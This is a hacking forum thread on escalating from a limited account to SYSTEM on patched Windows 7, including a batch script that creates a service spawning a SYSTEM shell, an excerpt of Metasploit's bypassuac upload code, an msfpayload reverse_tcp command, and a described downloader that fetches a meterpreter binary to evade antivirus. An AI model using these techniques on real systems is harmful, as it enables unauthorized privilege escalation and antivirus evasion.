Jump to content

Windows 7 Now Secure?


bobbyb1980

Recommended Posts

Just fired up a VM of a Windows 7 SP1 fully patched machine and see that it is no longer vulnerable to admin/system level escalation attacks from a limited user account? Tried getsystem and get an access denied error, bypassuac no longer works, any ideas?

Windows wins?

Link to comment
Share on other sites

Just fired up a VM of a Windows 7 SP1 fully patched machine and see that it is no longer vulnerable to admin/system level escalation attacks from a limited user account? Tried getsystem and get an access denied error, bypassuac no longer works, any ideas?

Windows wins?

Metasploit? Din't you just have this problem the other day? Migrate to a system process, then run get system? Limited user accounts usually don't give much in the way of anything though.

Try this in a bat script:

@echo off
@break off
title root
cls


sc create evil binpath= "cmd.exe /K start" type= own type= interact > nul 2>&1
pause
sc start evil > nul 2>&1
pause
whoami
pause
rem ping 127.0.0.1 -n 4 > nul 2>&1
echo Removing service.
echo.
sc delete evil > nul 2>&1

See if you get a pop up, then click ok to interact. Most peopel can still right click and "run as administrator" without password required in Windows 7, so run that bat by right clicking and run as admin. Should get you a new shell, as system.

Edited by digip
Link to comment
Share on other sites

The problem I had the other day was with XP. In Windows 7 you can migrate to a system process from a limited account but it won't give you sys privs like in XP.

I tried running that .bat, but in Windows 7 SP1 you can't run files as admin without an admin password. A shell pops up but nothing happens. That script works for you in Win 7 SP1 to go from a limited user acct to admin/system?

Link to comment
Share on other sites

The problem I had the other day was with XP. In Windows 7 you can migrate to a system process from a limited account but it won't give you sys privs like in XP.

I tried running that .bat, but in Windows 7 SP1 you can't run files as admin without an admin password. A shell pops up but nothing happens. That script works for you in Win 7 SP1 to go from a limited user acct to admin/system?

Can you pull the hash's and just crack the admin account?

Link to comment
Share on other sites

When I do that in my machine, it doens';t give me same privs, it opens an interactive shell, as SYSTEM, and I can then do anything without UAC interference, etc. Daves bypass UAC should still work as far as I know htough, you have to use it before getting system, then get system. Not sure on a limite duser account though.

edit: I also think he has a powershell one now, that hex dumps straight to memory to give you system, but don;t quote me on that. Check out SET.

Edited by digip
Link to comment
Share on other sites

I agree with Digip, try elevating your privileges by bypassing Windows 7 x86/64 with SET and Metasploit.

Here's nice video, demonstrating how to do it.

Link to comment
Share on other sites

Daves bypass UAC should still work as far as I know htough, you have to use it before getting system, then get system.

edit: I also think he has a powershell one now, that hex dumps straight to memory to give you system, but don;t quote me on that. Check out SET.

bypassuac is a good module and with some tweaking it can work, however it won't work right out of the box. You can upload your own payload, and depending on certain variables in your environment it may/may not work. I was able to get it to work, but after a lot of customization. By default Windows Defender and/or MS Security Essentials knows that payload very well.

Windows 7 seems to put in place an Ubuntu sudo style priv system which is a lot more secure than what XP uses. Even if you migrate to a system process from a limited user account, you can drop into a shell at C:\...System32 but you wont have system privs so I'm not exactly sure how you'd be getting them digi, you must have to be starting from an admin account.

I don't really use SET that much anymore but I'll check out this hexdump... can you be a little more specific about what attack vector you're talking about though?

I also found another way to escalate from limited user to admin by using cygwin, but it's very non practical and cygwin needs to be setup in a very specific way which probably doesn't exist outside my setup, possible though!

Link to comment
Share on other sites

If you are doing ANYTHING that touches disk as a payload, then it will generally fail. Dave's methods usually work because they never touch disk and run from memory, which is also why his stuff evades 99% of all anti-virus.

Link to comment
Share on other sites

bypassuac writes to the disk...

But thats a different flaw in UAC. His payloads and shell code all run in memory. If you patched this machine with the latest release(not just SP1) they put a fix in for microsoft signed programs authenticity. I'm not sure how Daves's bypass UAC worked, but if it was from certificate signing, might be patched against that now, which is a good thing and means msft finally got off their duff and fixed it. His flaw for bypassing UAC has been around for almost 2 years now, so you would think that they would have fixed it long ago. Its also possible you have missed something and it just doesn't work in the context of a limited user account. Most of these attacks are done in the corporate network on domains where they are pivoting from admin machines anyway. For what its worth, Win7 is pretty damn secure to begin with, its just that most people always run as admin, instead of limited user. Same goes for XP, although priv escalation in XP is still possible. If you are really having that much issue with it though, contact him on Twitter or on IRC. I'm sure he can figure something out to make it work, or see what you might have overlooked.

Edited by digip
Link to comment
Share on other sites

I got it working with my own custom payload.

bypassuac is no "special shellcode" nor does it "run in memory". I don't know where you got that from. It's a regular meterpreter payload and the only obfuscation the script runs is randomizing the binary name, which is why it triggers antivirus and why it doesn't work anymore.

Win7 is pretty damn secure to begin with

Lol... I thought the internet was run by hamsters or whatever you said in the other thread : P

Link to comment
Share on other sites

I got it working with my own custom payload.

bypassuac is no "special shellcode" nor does it "run in memory". I don't know where you got that from. It's a regular meterpreter payload and the only obfuscation the script runs is randomizing the binary name, which is why it triggers antivirus and why it doesn't work anymore.

Lol... I thought the internet was run by hamsters or whatever you said in the other thread : P

maybe I am wrong, but I thought Meterpreter ALWAYS runs from memory, and depending on the payloads, those are the things that touch disk. As for the whole hamster thing, yes, the Internet is insecure and win7 is pretty damn secure for the most part.

What may I ask was the exploit you used, and is it today patched, or still some 0day? and was the exploit via software OTHER than windows or was it strictly default windows itself? Did you disable the firewall or change settings in windows to make your payload work, etc.

Like I said before, nothing is full proof, but Win7 is pretty secure. That doesn't mean its fort knox nor do I think its inpenetrable, far from it. Your comment/sarcasm, is total shit though and sometimes, you are a total dick. Yes, I am calling you a dick, you can quote me on that. I can be one at times too, and yes, I troll hard on some people. Especially ones I think are dicks.

http://www.offensive-security.com/metasploit-unleashed/About_Meterpreter

adn I quote -

"Meterpreter resides entirely in memory and writes nothing to disk."

http://www.backtrack-linux.org/forums/showthread.php?t=36629

And why I said use SET not metasploit: https://community.rapid7.com/message/4037#4037

Aup3vGdCIAAxsn-.jpg

Edited by digip
Link to comment
Share on other sites

digip, you're my favorite dick on the internet.

Mostly because you're usually correct about what you say.

telot

Link to comment
Share on other sites

If I'm a dick - it's because I don't like taking bogus advice ; P

Since "His payloads and shell code all run in memory."... and "they never touch disk and run from memory, which is also why his stuff evades 99% of all anti-virus."... than what is the following code about taken from bypassuac.rb...

print_status("Uploading the bypass UAC executable to the filesystem...")

....


# Upload the payload to the filesystem
			#
			tempexe = tmpdir + "\\" + tempexe_name
			fd = client.fs.file.new(tempexe, "wb")
			fd.write(exe)
			fd.close
		rescue ::Exception => e
			print_error("Error uploading file #{filename}: #{e.class} #{e}")
			return

...
...

# delete the uac bypass payload
		delete_file = "cmd.exe /c del #{tmpdir}\\#{filename}"

That looks like something is being written to the disk to me...

p.s - bypassuac isn't only Kennedy, it's Mitnick's work also.

Edited by bobbyb1980
Link to comment
Share on other sites

And for the record, even with the SET payload - it's being written to disk. I actually used a very similar approach to get around the anti-virus which was writting a C++ program that downloads the meterpreter binary (the output of ./msfpayload windows/meterpreter/reverse_tcp LHOST=... LPORT=... R > payload.bin and encoded in a particular way which I'm not going to post here) which currently the av's do not pick up, and runs it from the .exe. If you want to know more - www.kokoromi.org/wp-content/themes/kokoromi/body.htmlcont.

The .exe downloads it from a remote host and when it's written to disk, because it's a .bin that excludes those null bytes the AV is looking for, AV isn't picking it up. The SET payload appears to be doing something very similar (executing a binary obtained from the internet from within another executable) hence evading the AV. Either way, during both procedures data is being written to disk

Link to comment
Share on other sites

If I'm a dick - it's because I don't like taking bogus advice ; P

Since "His payloads and shell code all run in memory."... and "they never touch disk and run from memory, which is also why his stuff evades 99% of all anti-virus."... than what is the following code about taken from bypassuac.rb...

print_status("Uploading the bypass UAC executable to the filesystem...")

....


# Upload the payload to the filesystem
			#
			tempexe = tmpdir + "\\" + tempexe_name
			fd = client.fs.file.new(tempexe, "wb")
			fd.write(exe)
			fd.close
		rescue ::Exception => e
			print_error("Error uploading file #{filename}: #{e.class} #{e}")
			return

...
...

# delete the uac bypass payload
		delete_file = "cmd.exe /c del #{tmpdir}\\#{filename}"

That looks like something is being written to the disk to me...

p.s - bypassuac isn't only Kennedy, it's Mitnick's work also.

I absolutely know its also Kevin's work, Kevin I believe is the one who contacted Dave for the help if I am not mistaken, they worked on it together. The one in Metasploit as far as I know is slightly diff than the one in SET, Dave uses two versions I believe in SET, one for 32bit and one for 64bit versions of windows(not sure if it works automatically or has to be setup in config ahead of time), which is why it might have failed on yours if used from Metasploit and it sent the 64bit version to a 32bit win7. I sent you some links of people having issues with it, and also someone showing the steps they took to make it work. This was to help you.

This again, is why I said try it from SET(and the latest version there in). As for an answer on it not working any longer last I heard it still worked when I talked to Dave yesterday, so its news to him if it is patched.

I am not an expert, I've never claimed to be, I'm not a programmer, I get things wrong from time to time, and I can take criticism or even someone correcting me when I am wrong, and am more than happy to learn something or be schooled when I am way off base. I'm not much of a hacker for that matter even, but I have never been anything but helpful to people since joining these forums, and always try to steer people in the right direction.

For all I know, you did something wrong in the process and you're the reason it failed. I can't prove that, nor does it really even matter, since none of us can see what you did, or are behind your shoulder watching the progress. I'm not there seeing what you've done or what steps you've taken. If my advice is so bogus, how do you know? If your such an expert, why post about issues when you can fix them yourself? Have you tried it from every which way? Are you 100% sure you didn't miss something like setting the payload for 32 bit vs 64bit?

Do this for me, so everyone can see clearly what the issue is, and if it is truly patched against, then for what its worth, we'll all know. Document everything you did, typed in, steps taken, updated versions of msf or set, backtrack, whatever it is you are using, etc, show us exactly what you've done in every step of the process, screen shots of commands and output, errors, or get some screen recording software and do a desktop video, and if anyone else on the forums sees something out of whack or done wrong, a step missed, I am sure they will reply with what to do to fix the issue if they have an answer, but if you want to argue for argument sake, thats fine too. I don't even know if the version of bypassuac in msf is the same as what is in SET. And just because it says sending payload to {tmpdir} that doesn't mean it isn't in ram only, but either way, I don't know nor really care. I'm only trying to help, so do what you do, say what you want, its up to you.

Link to comment
Share on other sites

Digip, come here man, give me a hug : )

I know you're just trying to help and that is GREATLY appreciated. I'm like you and have the tendancy to think in a million different directions, sometimes I even have problems verbalizing what I think. I apologize for my prior attitude, I was just frustrated with your well intentioned advice. I've been studying a lot of C++ lately and it's turned me into an uptight prick, I realize this when my wife and people on internet forums say the same thing about me :P But either way, I was wrong, we are both hackers and strive for the same thing and should always be mutually respectful of each other.

I believe you are still under the impression that I still don't have it working - it's working for me I just had to do things customly. To my understanding, the SET payload is executing a .bin from within another executable which is what I ended up doing to get it working. To my understand (which could very well be wrong), the inherent exploit (certificate) is still vulnerable, but like always the AV gets in the way of things (depending what AV you're using). So possibly for someone using a weak AV like ESET it could work fine, but if they're using Kaspersky it could be problematic.

Link to comment
Share on other sites

Digip, come here man, give me a hug : )

I know you're just trying to help and that is GREATLY appreciated. I'm like you and have the tendancy to think in a million different directions, sometimes I even have problems verbalizing what I think. I apologize for my prior attitude, I was just frustrated with your well intentioned advice. I've been studying a lot of C++ lately and it's turned me into an uptight prick, I realize this when my wife and people on internet forums say the same thing about me :P But either way, I was wrong, we are both hackers and strive for the same thing and should always be mutually respectful of each other.

I believe you are still under the impression that I still don't have it working - it's working for me I just had to do things customly. To my understanding, the SET payload is executing a .bin from within another executable which is what I ended up doing to get it working. To my understand (which could very well be wrong), the inherent exploit (certificate) is still vulnerable, but like always the AV gets in the way of things (depending what AV you're using). So possibly for someone using a weak AV like ESET it could work fine, but if they're using Kaspersky it could be problematic.

::manhug:: /looks around, makes sure no one is looking..lol

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...